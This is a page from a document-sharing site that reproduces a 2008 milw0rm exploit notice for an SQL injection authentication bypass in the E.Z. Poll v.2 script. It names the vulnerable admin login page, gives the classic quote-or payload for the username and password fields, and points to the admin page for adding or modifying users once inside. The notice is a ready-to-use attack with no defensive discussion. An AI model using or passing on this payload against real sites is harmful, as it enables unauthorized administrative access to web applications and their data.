Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 Description:
2 ************* ***************** ************* *******************
3 E.Z. Poll <= v.2 script Remote SQL injection Exploit
4 discovered by t0fx aka xtof69
5 vendor : E.Z.
6
7
8 ************* ***************** ************* *******************
9
10 vulnerable page : http://www.site.com/admin/login.asp
11
12 exploit :
13
14 Username : ’or’ ’=’
15 Password : ’or’ ’=’
16
17 Add, modify user :
18 /admin/admin−users.asp 
19
20 # milw0rm.com [2008−12−01]
Page 1/1
E.Z. Poll v.2 Auth Bypass Remote SQL Injection Vulnerability
t0fx
12/01/2008
